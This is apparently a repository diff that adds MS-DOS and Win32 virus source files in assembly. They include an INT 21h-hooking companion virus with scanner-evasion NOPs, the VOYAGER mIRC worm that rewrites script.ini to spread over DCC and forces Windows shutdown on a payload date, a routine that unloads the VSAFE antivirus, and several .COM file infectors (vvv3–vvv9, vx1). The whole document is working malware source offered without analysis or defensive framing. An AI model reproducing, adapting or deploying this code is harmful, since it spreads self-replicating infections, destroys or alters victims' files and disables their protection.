db 07h,07h,'$'
;****************************************************************************
;* Interrupt handler 24
;****************************************************************************
ni24: mov al,03 ;virus critical error handler
iret ;prevents embarrassing messages
;on attempted writes to protected disks
;****************************************************************************
;* Interrupt handler 21
;****************************************************************************
ni21: pushf
push es
push ds
push ax
push bx
push dx
cmp ax,4B00h ;now that we're installed
jne exit ; check for 4B00, DOS excutions
doit: call infect ; if one comes by, grab it
exit: pop dx ; if anything else, goto sleep
pop bx
pop ax
pop ds
pop es
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
;****************************************************************************
;* Try to infect a file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov word ptr cs:[nameptr],dx ;save the ptr to the filename
mov word ptr cs:[nameptr+2],ds
mov ah,2Fh ;get old DTA
int 21
push es
push bx
push cs ;set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21
call searchpoint ; here's where we grab a name
push di ; for ourselves
mov si,offset COM_txt ;is extension 'COM'?
mov cx,3
rep cmpsb
pop di
jz do_com ;if so, go to our .COM routine
mov si,offset EXE_txt ;is extension 'EXE'?
nop ;'nop' to confuse SCAN v85b.
mov cl,3
rep cmpsb
jnz return
do_exe: mov si,offset COM_txt ;change extension to COM
nop ;another 'nop' to confuse SCAN
call change_ext
mov ax,3300h ;get ctrl-break flag
nop
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vector to new handler
pop ds ;virus handles machine
mov dx,offset ni24 ;exits on attempted writes
mov ah,25h ;to write-protected disks
push ax
int 21
lds dx,dword ptr [nameptr] ;create the virus (with name of .EXE target)
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 021h ; makes it hidden/system/read-only
; do it
xchg bx,ax ;save handle
push cs
pop ds
mov cx,endit - begin ; write the virus to the created file
mov dx,offset begin ; CX contains length
mov ah,40h ; write to file function
int 21
mov ah,3Eh ;close the file
int 21
return1: pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
mov si,offset EXE_txt ;change extension to EXE
call change_ext ;execute EXE-file
return: mov ah,1Ah ;restore old DTA
pop dx
pop ds
int 21
ret
do_com: call findfirst ;is the COM-file a virus?
cmp word ptr cs:[DTA+1Ah],endit - begin ;compare it to virus length
jne return ;no, so execute COM-file
mov si,offset EXE_txt ;does the EXE-variant exist?
call change_ext
call findfirst
jnc return ;yes, execute EXE-file
mov si,offset COM_txt ;change extension to COM
call change_ext
jmp short return ;execute COM-file
;****************************************************************************
;* Search beginning of extension for name we will usurp
;****************************************************************************
searchpoint: les di,dword ptr cs:[nameptr]
mov ch,0FFh
mov al,0
repnz scasb
sub di,4
ret
;****************************************************************************
;* Change the extension of the filename (CS:SI -> ext)
;****************************************************************************
change_ext: call searchpoint
push cs
pop ds
movsw
movsw
ret
;****************************************************************************
;* Find the file
;****************************************************************************
findfirst: lds dx,dword ptr [nameptr]
mov cl,27h
mov ah,4Eh
int 21
ret
;****************************************************************************
;* Get the day off the system for activation checking
;****************************************************************************
get_day:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
;*************************************************************************
;* Get the month off the system for activation checking
;*************************************************************************
get_month:
mov ah,02Ah ; DOS get date function
int 021h
mov al,dh ; Copy month into AL
cbw ; Sign-extend AL into AX
ret ; Get back to caller
endit:
code ends
end begin

214
MSDOS/Virus.MSDOS.Unknown.voyager.asm Normal file
View File

@ -0,0 +1,214 @@
;
; VOYAGER.mIRC.Worm.Win32
; by Bumblebee/[Hail and Kill]
;
; . This is a simple mIRC worm. Creates -if not exists- a directory
; called 'C:\Temp' and stores there 'Voyager.exe'. Then searches for
; mIRC in 'c:\mirc' and 'c:\mirc32'. If mIRC is found then deletes
; the 'script.ini' and writes its own script.
;
; . Sets to 'Voyager.exe' read-only and hidden attributes.
; . ExitWindows if Voyager is executed in payload date.
;
; . Is a Win32 program -only uses API- and due to this it must work
; fine under Win95/Win98/WinNT. Is small but -fucking windows- its
; size is 4096 bytes long.
;
; tasm /ml /m3 v32,,;
; tlink32 -Tpe -c v32,v32,, import32.lib
;
.386
locals
jumps
.model flat,STDCALL
; procs to import
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetCommandLineA:PROC
extrn GetCurrentDirectoryA:PROC
extrn SetCurrentDirectoryA:PROC
extrn CreateDirectoryA:PROC
extrn VirtualAlloc:PROC
extrn CopyFileA:PROC
extrn SetFileAttributesA:PROC
extrn GetSystemTime:PROC
extrn ExitWindowsEx:PROC
virusSize equ 4096
scriptSize equ endScript-mIRCScript
.DATA
db 0dh,0ah
id db 'VOYAGER.mIRC.Worm.Win32 by Bumblebee/[Hail and Kill]',0
db 0dh,0ah
scriptName db 'Script.ini',0
virusDir db 'C:\Temp',0
destVir db 'C:\Temp\Voyager.exe',0
mIRCScript db '[SCRIPT]',0,0dh,0ah
db 'n0=on 1:TEXT:*sting*:#:/msg $chan VOYAGER.mIRC.Worm.Win32'
db ' by Bumblebee/[Hail and Kill] at your service!',0
db 0dh,0ah
db 'n1=on 1:TEXT:*bee*:#:/msg $chan The way of the bee!',0
db 0dh,0ah
db 'n2=on 1:FILESENT:*.*:/if ( $me != $nick ) { /dcc send'
db ' $nick c:\temp\voyager.exe }',0,0dh,0ah
endScript db 0
mIRCDir0 db 'c:\mirc',0
mIRCDir1 db 'c:\mirc32',0
fHnd dd ?
cdirHnd dd ?
commandLine dd ?
size2Read dd 0
sysTimeStruct db 16 dup(0)
.CODE
inicio:
call GetCommandLineA ; get command line
mov dword ptr [commandLine],eax
skipArgs: ; skip args
cmp dword ptr [eax],'EXE.'
je argsOk
inc eax
jmp skipArgs
argsOk:
add eax,4
mov byte ptr [eax],0
push 00000004h ; read/write page
push 00001000h ; mem commit (reserve phys mem)
push 1024 ; size to alloc
push 0h ; let system decide where to alloc
call VirtualAlloc
cmp eax,0
je goOut ; ops... not memory to alloc?
mov dword ptr [cdirHnd],eax
push dword ptr [cdirHnd] ; get current directory
push 1024
call GetCurrentDirectoryA
cmp eax,0
je goErrOut
goDir:
lea eax,virusDir
push eax
call SetCurrentDirectoryA
cmp eax,0
jne skipCreateDir ; directory exists
xor eax,eax
push 0
lea eax,virusDir
push eax
call CreateDirectoryA ; create the directory
cmp eax,0
je goOut
jmp goDir
skipCreateDir:
push 0 ; overwrite if exists
lea eax,destVir
push eax
push dword ptr [commandLine]
call CopyFileA ; install Voyager into c:\Temp
cmp eax,0
je mIRCCheck
push 00000001h OR 00000002h ; set read only and hidden
lea eax,destVir
push eax
call SetFileAttributesA ; set voyager new attributes
mIRCCheck:
lea eax,mIRCDir0
push eax
call SetCurrentDirectoryA
cmp eax,0
je installScript ; directory exists -> mIRC found!
lea eax,mIRCDir1
push eax
call SetCurrentDirectoryA
cmp eax,0
jne goOut ; directory exists -> mIRC found!
installScript:
lea eax,scriptName
push eax ; delete script.ini
call DeleteFileA
xor eax,eax
push eax
push 00000020h ; archive
push 1
push eax
push 00000001h OR 00000002h
push 40000000h
lea eax,scriptName
push eax
call CreateFileA ; open new script for write (shared)
cmp eax,-1
je goOut
mov dword ptr [fHnd],eax
push 0
mov dword ptr [size2Read],0
lea eax,size2Read
push eax
mov eax,scriptSize
push eax
lea eax,mIRCScript
push eax
push dword ptr [fHnd]
call WriteFile ; write script.ini
mov eax,dword ptr [fHnd] ; close file
push eax
call CloseHandle
goOut:
push dword ptr [cdirHnd] ; restore work directory
call SetCurrentDirectoryA
goErrOut:
lea eax,sysTimeStruct ; check for payload
push eax
call GetSystemTime
lea eax,sysTimeStruct ; 5th day of month?
cmp word ptr [eax+6],5
jne exitLoop
xor eax,eax
mov eax,1
or eax,4
push eax
push eax
call ExitWindowsEx ; close windows ;)
exitLoop:
push 0h ; exit
call ExitProcess
jmp exitLoop
Ends
End inicio

19
MSDOS/Virus.MSDOS.Unknown.vslay.asm Normal file
View File

@ -0,0 +1,19 @@
;VSLAY - simple de-install Microsoft Antivirus VSAFE
;demonstration code for Crypt Newsletter 16
code segment
assume cs:code, ds:code, es:code, ss:nothing
org 100h
begin: call vslay
vslay:
mov ax,64001 ;wakes up VSAFE to keyboard input
mov dx,5945h ;asks VSAFE to de-install
int 16h ;calls VSAFE-hooked interrupt: keyboard
ret ;exit
code ends
end begin

1992
MSDOS/Virus.MSDOS.Unknown.vsource.asm Normal file
View File

File diff suppressed because it is too large Load Diff

127
MSDOS/Virus.MSDOS.Unknown.vvv3.asm Normal file
View File

@ -0,0 +1,127 @@
.model tiny
.code
org 100h
kkk:
nop ; ID
nop ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov ds:[0f6h],cx ; begin buffer R
mov cx,ax
lea si,kkk
mov di,ds:[0f8h]
RB: REP MOVSB ; move v
stc
LEA DX,FFF
MOV AH,4EH
MOV CX,20H
INT 21H ; find first
or ax,ax
jz LLL
jmp done
LLL:
MOV AH,2FH
INT 21H ; get DTA
mov ax,es:[bx+1ah]
mov ds:[0fch],ax ; size
add bx,1eh
mov ds:[0feh],bx ; point to name
clc
mov ax,3d02h
mov dx,bx
int 21h ; open file
mov bx,ax
mov ah,3fh
mov cx,ds:[0fch]
mov dx,ds:[0f6h]
int 21h ; read file
mov bx,dx
mov ax,[bx]
sub ax,9090h
jz fin
MOV AX,ds:[0fch]
mov bx,ds:[0f6h]
mov [bx-2],ax ; correct old len
mov ah,3ch
mov cx,00h
mov dx,ds:[0feh] ; point to name
clc
int 21h ; create file
mov bx,ax ; #
mov ah,40h
mov cx,ds:[0fch]
add cx,ds:[0fah]
mov DX,ds:[0f8h]
int 21h ; write file
mov ah,3eh
int 21h ;close file
FIN:
stc
mov ah,4fh
int 21h ; find next
or ax,ax
jnz done
JMP lll
DONE:
mov cx,80h
mov si,0ff7fh
mov di,0080h
rep movsb ; restore param
MOV AX,0A4F3H
mov ds:[0fff9h],ax
mov al,0eah
mov ds:[0fffbh],al
mov ax,100h
mov ds:[0fffch],ax
lea si,begp
lea di,kkk
mov ax,cs
mov ds:[0fffeh],ax
mov kk,ax
mov cx,fso
db 0eah
dw 0fff9h
kk dw 0000h
fff db '*?.com',0
fso dw 0005h ; ----- alma mater
begp:
MOV AX,4C00H
int 21h ; exit
end kkk

134
MSDOS/Virus.MSDOS.Unknown.vvv4.asm Normal file
View File

@ -0,0 +1,134 @@
.model tiny
.code
org 100h
kkk:
nop ; ID
nop ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov ds:[0f6h],cx ; begin buffer R
mov cx,ax
lea si,kkk
mov di,ds:[0f8h]
RB: REP MOVSB ; move v
stc
LEA DX,FFF
MOV AH,4EH
MOV CX,20H
INT 21H ; find first
or ax,ax
jz LLL
jmp done
LLL:
MOV AH,2FH
INT 21H ; get DTA
mov ax,es:[bx+1ah]
mov ds:[0fch],ax ; size
add bx,1eh
mov ds:[0feh],bx ; point to name
add ax,180h ; if new len file + len VIR + 180h > FFF0
add ax,ds:[0fah] ; then skip this file
add ax,fso
cmp ax,0fff0h
ja fin
clc
mov ax,3d02h
mov dx,bx
int 21h ; open file
mov bx,ax
mov ah,3fh
mov cx,ds:[0fch]
mov dx,ds:[0f6h]
int 21h ; read file
mov bx,dx
mov ax,[bx]
sub ax,9090h
jz fin ; if file inf. then skip this file
MOV AX,ds:[0fch]
mov bx,ds:[0f6h]
mov [bx-2],ax ; correct old len
mov ah,3ch
mov cx,00h
mov dx,ds:[0feh] ; point to name
clc
int 21h ; create file
mov bx,ax ; #
mov ah,40h
mov cx,ds:[0fch]
add cx,ds:[0fah]
mov DX,ds:[0f8h]
int 21h ; write file
mov ah,3eh
int 21h ;close file
FIN:
stc
mov ah,4fh
int 21h ; find next
or ax,ax
jnz done
JMP lll
DONE:
mov cx,80h
mov si,0ff7fh
mov di,0080h
rep movsb ; restore param
MOV AX,0A4F3H
mov ds:[0fff9h],ax
mov al,0eah
mov ds:[0fffbh],al
mov ax,100h
mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100
lea si,begp
lea di,kkk
mov ax,cs
mov ds:[0fffeh],ax
mov kk,ax
mov cx,fso
db 0eah
dw 0fff9h
kk dw 0000h
fff db '*?.com',0
fso dw 0005h ; source len file
begp:
MOV AX,4C00H
int 21h ; exit
end kkk

143
MSDOS/Virus.MSDOS.Unknown.vvv5.asm Normal file
View File

@ -0,0 +1,143 @@
.model tiny
.code
org 100h
kkk:
nop ; ID
nop ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov ds:[0f6h],cx ; begin buffer R
mov cx,ax
lea si,kkk
mov di,ds:[0f8h]
RB: REP MOVSB ; move v
stc
LEA DX,FFF
MOV AH,4EH
MOV CX,20H
INT 21H ; find first
or ax,ax
jz LLL
jmp done
LLL:
MOV AH,2FH
INT 21H ; get DTA
mov ax,es:[bx+1ah]
mov ds:[0fch],ax ; size
add bx,1eh
mov ds:[0feh],bx ; point to name
add ax,180h ; if new len file + len VIR + 180h > FFF0
add ax,ds:[0fah] ; then skip this file
add ax,fso
cmp ax,0fff0h
ja fin
clc
mov ax,3d02h
mov dx,bx
int 21h ; open file
mov bx,ax
mov ah,3fh
mov cx,ds:[0fch]
mov dx,ds:[0f6h]
int 21h ; read file
mov bx,dx
mov ax,[bx]
sub ax,9090h
jz fin ; if file inf. then skip this file
mov al,'M'
mov di,dx
mov cx,ds:[0fch]
repne scasb
jne cont
mov al,'Z'
cmp es:[di],al
je fin ; if converted then skip
cont:
MOV AX,ds:[0fch]
mov bx,ds:[0f6h]
mov [bx-2],ax ; correct old len
mov ah,3ch
mov cx,00h
mov dx,ds:[0feh] ; point to name
clc
int 21h ; create file
mov bx,ax ; #
mov ah,40h
mov cx,ds:[0fch]
add cx,ds:[0fah]
mov DX,ds:[0f8h]
int 21h ; write file
mov ah,3eh
int 21h ;close file
FIN:
stc
mov ah,4fh
int 21h ; find next
or ax,ax
jnz done
JMP lll
DONE:
mov cx,80h
mov si,0ff7fh
mov di,0080h
rep movsb ; restore param
MOV AX,0A4F3H
mov ds:[0fff9h],ax
mov al,0eah
mov ds:[0fffbh],al
mov ax,100h
mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100
lea si,begp
lea di,kkk
mov ax,cs
mov ds:[0fffeh],ax
mov kk,ax
mov cx,fso
db 0eah
dw 0fff9h
kk dw 0000h
fff db '*?.com',0
fso dw 0005h ; source len file
begp:
MOV AX,4C00H
int 21h ; exit
end kkk

147
MSDOS/Virus.MSDOS.Unknown.vvv6.asm Normal file
View File

@ -0,0 +1,147 @@
.model tiny
.code
org 100h
kkk:
nop ; ID
nop ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov ds:[0f6h],cx ; begin buffer R
mov cx,ax
lea si,kkk
mov di,ds:[0f8h]
RB: REP MOVSB ; move v
stc
LEA DX,FFF
MOV AH,4EH
MOV CX,20H
INT 21H ; find first
or ax,ax
jz LLL
jmp done
LLL:
MOV AH,2FH
INT 21H ; get DTA
mov ax,es:[bx+1ah]
mov ds:[0fch],ax ; size
add bx,1eh
mov ds:[0feh],bx ; point to name
mov ax,'OC' ; "CO"
sub ax,ds:[009eh]
je fin ; if file name CO*.com then skip
add ax,180h ; if new len file + len VIR + 180h > FFF0
add ax,ds:[0fah] ; then skip this file
add ax,fso
cmp ax,0fff0h
ja fin
clc
mov ax,3d02h
mov dx,bx
int 21h ; open file
mov bx,ax
mov ah,3fh
mov cx,ds:[0fch]
mov dx,ds:[0f6h]
int 21h ; read file
mov bx,dx
mov ax,[bx]
sub ax,9090h
jz fin ; if file inf. then skip this file
mov al,'M'
mov di,dx
mov cx,ds:[0fch]
repne scasb
jne cont
mov al,'Z'
cmp es:[di],al
je fin ; if converted then skip
cont:
MOV AX,ds:[0fch]
mov bx,ds:[0f6h]
mov [bx-2],ax ; correct old len
mov ah,3ch
mov cx,00h
mov dx,ds:[0feh] ; point to name
clc
int 21h ; create file
mov bx,ax ; #
mov ah,40h
mov cx,ds:[0fch]
add cx,ds:[0fah]
mov DX,ds:[0f8h]
int 21h ; write file
mov ah,3eh
int 21h ;close file
FIN:
stc
mov ah,4fh
int 21h ; find next
or ax,ax
jnz done
JMP lll
DONE:
mov cx,80h
mov si,0ff7fh
mov di,0080h
rep movsb ; restore param
MOV AX,0A4F3H
mov ds:[0fff9h],ax
mov al,0eah
mov ds:[0fffbh],al
mov ax,100h
mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100
lea si,begp
lea di,kkk
mov ax,cs
mov ds:[0fffeh],ax
mov kk,ax
mov cx,fso
db 0eah
dw 0fff9h
kk dw 0000h
fff db '*?.com',0
fso dw 0005h ; source len file
begp:
MOV AX,4C00H
int 21h ; exit
end kkk

153
MSDOS/Virus.MSDOS.Unknown.vvv7.asm Normal file
View File

@ -0,0 +1,153 @@
.model tiny
.code
org 100h
kkk:
nop ; ID
count db 90h ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov ds:[0f6h],cx ; begin buffer R
mov cx,ax
lea si,kkk
mov di,ds:[0f8h]
RB: REP MOVSB ; move v
mov al,3 ; inf. only 3 file
mov count,al
stc
LEA DX,FFF
MOV AH,4EH
MOV CX,20H
INT 21H ; find first
or ax,ax
jz LLL
jmp done
LLL:
MOV AH,2FH
INT 21H ; get DTA
mov ax,es:[bx+1ah]
mov ds:[0fch],ax ; size
add bx,1eh
mov ds:[0feh],bx ; point to name
mov ax,'OC' ; "CO"
sub ax,ds:[009eh]
je fin ; if file name CO*.com then skip
add ax,180h ; if new len file + len VIR + 180h > FFF0
add ax,ds:[0fah] ; then skip this file
add ax,fso
cmp ax,0fff0h
ja fin
clc
mov ax,3d02h
mov dx,bx
int 21h ; open file
mov bx,ax
mov ah,3fh
mov cx,ds:[0fch]
mov dx,ds:[0f6h]
int 21h ; read file
mov bx,dx
mov ax,[bx]
sub ax,9090h
jz fin ; if file inf. then skip this file
mov al,'M'
mov di,dx
mov cx,ds:[0fch]
repne scasb
jne cont
mov al,'Z'
cmp es:[di],al
je fin ; if converted then skip
cont:
MOV AX,ds:[0fch]
mov bx,ds:[0f6h]
mov [bx-2],ax ; correct old len
mov ah,3ch
mov cx,00h
mov dx,ds:[0feh] ; point to name
clc
int 21h ; create file
mov bx,ax ; #
mov ah,40h
mov cx,ds:[0fch]
add cx,ds:[0fah]
mov DX,ds:[0f8h]
int 21h ; write file
mov ah,3eh
int 21h ;close file
dec count
jz done
FIN:
stc
mov ah,4fh
int 21h ; find next
or ax,ax
jnz done
JMP lll
DONE:
mov cx,80h
mov si,0ff7fh
mov di,0080h
rep movsb ; restore param
MOV AX,0A4F3H
mov ds:[0fff9h],ax
mov al,0eah
mov ds:[0fffbh],al
mov ax,100h
mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100
lea si,begp
lea di,kkk
mov ax,cs
mov ds:[0fffeh],ax
mov kk,ax
mov cx,fso
db 0eah
dw 0fff9h
kk dw 0000h
fff db '*?.com',0
fso dw 0005h ; source len file
begp:
MOV AX,4C00H
int 21h ; exit
end kkk

183
MSDOS/Virus.MSDOS.Unknown.vvv8.asm Normal file
View File

@ -0,0 +1,183 @@
.model tiny
.code
org 100h
kkk:
nop ; ID
count db 90h ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov ds:[0f6h],cx ; begin buffer R
mov cx,ax
lea si,kkk
mov di,ds:[0f8h]
RB: REP MOVSB ; move v
mov al,3 ; inf. only 3 file
mov count,al
mov ah,2ah
int 21h
mov ds:[0f2h],dx ;
mov ds:[0f4h],cx ; save system date
stc
LEA DX,FFF
MOV AH,4EH
MOV CX,20H
INT 21H ; find first
or ax,ax
jz LLL
jmp done
LLL:
MOV AH,2FH
INT 21H ; get DTA
mov ax,es:[bx+1ah]
mov ds:[0fch],ax ; size
add bx,1eh
mov ds:[0feh],bx ; point to name
mov ax,'OC' ; "CO"
sub ax,ds:[009eh]
jne cont0 ; if file name CO*.com then skip
jmp fin
cont0:
add ax,180h ; if new len file + len VIR + 180h > FFF0
add ax,ds:[0fah] ; then skip this file
add ax,fso
cmp ax,0fff0h
jna cont2
jmp fin
cont2:
mov cx,ds:[98h]
and cx,001fh
mov dl,cl
mov ax,ds:[98h]
and ax,01e0h
mov cl,5
sar ax,cl
mov dh,al
mov ax,ds:[98h]
and ax,0fe00h
mov cl,9
sar ax,cl
mov cx,ax
add cx,1980
mov ah,2bh
int 21h ; set system time
clc
mov ax,3d02h
mov dx,bx
int 21h ; open file
mov bx,ax
mov ah,3fh
mov cx,ds:[0fch]
mov dx,ds:[0f6h]
int 21h ; read file
mov bx,dx
mov ax,[bx]
sub ax,9090h
jz fin ; if file inf. then skip this file
mov al,'M'
mov di,dx
mov cx,ds:[0fch]
repne scasb
jne cont
mov al,'Z'
cmp es:[di],al
je fin ; if converted then skip
cont:
MOV AX,ds:[0fch]
mov bx,ds:[0f6h]
mov [bx-2],ax ; correct old len
mov ah,3ch
mov cx,00h
mov dx,ds:[0feh] ; point to name
clc
int 21h ; create file
mov bx,ax ; #
mov ah,40h
mov cx,ds:[0fch]
add cx,ds:[0fah]
mov DX,ds:[0f8h]
int 21h ; write file
mov ah,3eh
int 21h ;close file
dec count
jz done
FIN:
stc
mov ah,4fh
int 21h ; find next
or ax,ax
jnz done
JMP lll
DONE:
mov dx,ds:[0f2h]
mov cx,ds:[0f4h]
mov ah,2bh
int 21h
mov cx,80h
mov si,0ff7fh
mov di,0080h
rep movsb ; restore param
MOV AX,0A4F3H
mov ds:[0fff9h],ax
mov al,0eah
mov ds:[0fffbh],al
mov ax,100h
mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100
lea si,begp
lea di,kkk
mov ax,cs
mov ds:[0fffeh],ax
mov kk,ax
mov cx,fso
db 0eah
dw 0fff9h
kk dw 0000h
fff db '*?.com',0
fso dw 0005h ; source len file
begp:
MOV AX,4C00H
int 21h ; exit
end kkk

189
MSDOS/Virus.MSDOS.Unknown.vvv9.asm Normal file
View File

@ -0,0 +1,189 @@
.model tiny
.code
org 100h
kkk:
nop ; ID
count db 90h ; ID
mov cx,80h
mov si,0080h
mov di,0ff7fh
rep movsb ; save param
lea ax,begp ; begin prog
mov cx,ax
sub ax,100h
mov ds:[0fah],ax ; len VIR
add cx,fso
mov ds:[0f8h],cx ; begin buffer W
ADD CX,AX
mov ds:[0f6h],cx ; begin buffer R
mov cx,ax
lea si,kkk
mov di,ds:[0f8h]
RB: REP MOVSB ; move v
mov al,3 ; inf. only 3 file
mov count,al
mov ah,2ah
int 21h
mov ds:[0f2h],dx ;
mov ds:[0f4h],cx ; save system date
stc
LEA DX,FFF
MOV AH,4EH
MOV CX,20H
INT 21H ; find first
or ax,ax
jz LLL
jmp done
LLL:
MOV AH,2FH
INT 21H ; get DTA
mov ax,es:[bx+1ah]
mov ds:[0fch],ax ; size
add bx,1eh
mov ds:[0feh],bx ; point to name
mov ax,'OC' ; "CO"
sub ax,ds:[009eh]
jne cont0 ; if file name CO*.com then skip
jmp fin
cont0:
add ax,180h ; if new len file + len VIR + 180h > FFF0
add ax,ds:[0fah] ; then skip this file
add ax,fso
cmp ax,0fff0h
jna cont2
jmp fin
cont2:
mov cx,ds:[98h]
and cx,001fh
mov dl,cl
mov ax,ds:[98h]
and ax,01e0h
mov cl,5
sar ax,cl
mov dh,al
mov ax,ds:[98h]
and ax,0fe00h
mov cl,9
sar ax,cl
mov cx,ax
add cx,1980
mov ah,2bh
int 21h ; set system time
clc
mov ax,3d02h
mov dx,bx
int 21h ; open file
mov bx,ax
mov ah,3fh
mov cx,ds:[0fch]
mov dx,ds:[0f6h]
int 21h ; read file
mov bx,dx
mov ax,[bx]
cmp ax,9090h
je fin ; if file inf. then skip this file
cmp ax,'ZM'
je fin ; if file .COM is EXE then skip
mov di,dx
mov cx,ds:[0fch]
NEWS:
or cx,cx
js cont
mov al,'M'
repne scasb
jne cont
mov al,'Z'
cmp es:[di],al
je fin ; if converted then skip
jmp news
cont:
MOV AX,ds:[0fch]
mov bx,ds:[0f6h]
mov [bx-2],ax ; correct old len
mov ah,3ch
mov cx,00h
mov dx,ds:[0feh] ; point to name
clc
int 21h ; create file
mov bx,ax ; #
mov ah,40h
mov cx,ds:[0fch]
add cx,ds:[0fah]
mov DX,ds:[0f8h]
int 21h ; write file
mov ah,3eh
int 21h ;close file
dec count
jz done
FIN:
stc
mov ah,4fh
int 21h ; find next
or ax,ax
jnz done
JMP lll
DONE:
mov dx,ds:[0f2h]
mov cx,ds:[0f4h]
mov ah,2bh
int 21h
mov cx,80h
mov si,0ff7fh
mov di,0080h
rep movsb ; restore param
MOV AX,0A4F3H
mov ds:[0fff9h],ax
mov al,0eah
mov ds:[0fffbh],al
mov ax,100h
mov ds:[0fffch],ax ; remove REP MOVSB and FAR JMP cs:0100
lea si,begp
lea di,kkk
mov ax,cs
mov ds:[0fffeh],ax
mov kk,ax
mov cx,fso
db 0eah
dw 0fff9h
kk dw 0000h
fff db '*?.com',0
fso dw 0005h ; source len file
begp:
MOV AX,4C00H
int 21h ; exit
end kkk

118
MSDOS/Virus.MSDOS.Unknown.vx1.asm Normal file
View File

@ -0,0 +1,118 @@
Code Segment
Assume CS:Code,DS:Code,ES:Code
V_Length Equ Program - Main
F_Name Equ 0FC1Eh
F_Time Equ 0FC16h
F_Date Equ 0FC18h
HAdr Equ 0FD00h
DTA Equ 0FC00h
Org 100h
Main:
push [BOP] ;bewaar orginele offset programma
mov ah,1ah ;DTA boven neerzetten
mov dx,DTA ;DTA adres
int 21h
mov ah,4eh ;zoek naar COM files
mov dx,Offset Target
xor cx,cx
int 21h
Read_file:
mov ax,3d02h ;open het doelbestand
mov dx,Offset F_Name
int 21h
mov bx,ax ;bewaar de file handle
mov bp,cs:[F_Time] ;Bewaar de tijd
mov di,cs:[F_Date] ;Bewaar de datum
mov ah,3fh ;lees deel van het doelbestand
mov dx,Hadr ;buffer adres
mov cx,V_Length ;lengte van het 4us
int 21h ;naar het hoog adres in
mov si,dx ;Is het bestand al geinfecteerd?
cmp Word Ptr [si],36ffh
jne Infect_File ;Nee, infecteer het
mov ah,4fh ;Zoek volgende COM bestand
int 21h
jc End_Infect
jmp Short Read_File
Infect_File:
mov ax,4202h ;zoek naar het einde van doelbestand
xor cx,cx ;ax bevat na het na het uitvoeren van
xor dx,dx ;de interrupt de lengte van de file
int 21h
add ax,100h ;tel 100h bytes PSP erbij op en
mov BOP,ax ;bewaar de lengte van het doelbestand
mov ah,40h ;overschrijf begin van doelbestand
mov cx,V_Length ;lengte van het 4us
mov dx,HAdr ;buffer
int 21h
mov ax,4200h ;zoek het begin van het doelbestand op
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;schrijf de 4uscode over de file
mov cx,V_Length ;lengte van het 4us
mov dx,Offset Main
int 21h
mov ax,5701h ;zet orginele datum terug
mov dx,di ;datum
mov cx,bp ;tijd
int 21h
End_Infect:
mov ah,3eh ;sluit het doelbestand af
int 21h
mov ah,1ah ;set DTA terug naar default
mov dx,0080h
int 21h
cld ;voorwaarts
mov di,HAdr ;buffer
push di ;en nog een voor het verplaatsen straks
mov si,Offset MoveBlock ;wijst naar relocator
mov cx,Program - MoveBlock ;lengte relocator
rep movsb ;verplaats het block
ret ;en ga er naar toe
BOP dw Offset Program
MoveBlock:
mov cx,V_Length ;aantal bytes dat verplaatst wordt
pop si ;haal BOP terug via de stack
mov di,0100h ;hier gaat het allemaal naar toe
push di ;bewaar voor de RET
rep movsb ;verplaatsen
ret ;en start orginele programma op
Target:
db '*.com',0
Program: ;Dit is het fake programma wat later
mov ah,4ch ;door de relocator verplaatst wordt
int 21h ;naar het begin van de file
Code Ends
End Main
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
